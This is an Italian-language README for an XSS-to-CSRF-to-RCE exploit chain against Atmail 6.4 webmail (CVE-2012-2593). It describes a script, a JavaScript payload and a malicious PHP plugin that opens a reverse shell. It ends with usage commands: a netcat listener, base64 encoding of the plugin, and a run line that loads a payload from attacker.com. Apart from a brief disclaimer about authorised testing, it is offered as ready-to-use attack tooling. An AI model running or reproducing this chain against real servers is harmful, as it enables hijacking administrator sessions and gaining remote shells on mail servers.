
Catena di exploit Atmail XSS-CSRF-RCE
atmail-rce.py: Sfrutta CVE-2012-2593 nell'interfaccia webmail di Atmail.
atmail-csrf.js: File Javascript che sfrutta CVE-2012-2593 per effettuare un CSRF al fine di installare un plugin malevolo che esegue una reverse shell
Plugin.php: Plugin di Atmail da installare che richiama una reverse shell
!!Utilizzare solo contro server su cui si ha il permesso di testare
Il server email Atmail versione 6.4 presenta una vulnerabilità XSS sia nell'intestazione email Date che nel Corpo dell'email (tramite iniezione di iFrame). Questo viene sfruttato per un CSRF utilizzando l'API XHR di Javascript per inviare una richiesta con il cookie dell'utente amministratore al pannello di amministrazione, installando un Plugin malevolo che esegue codice per una reverse shell.
nc -lvp 4444gzip -c Plugin.php | base64 | tr -d [:space:]python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/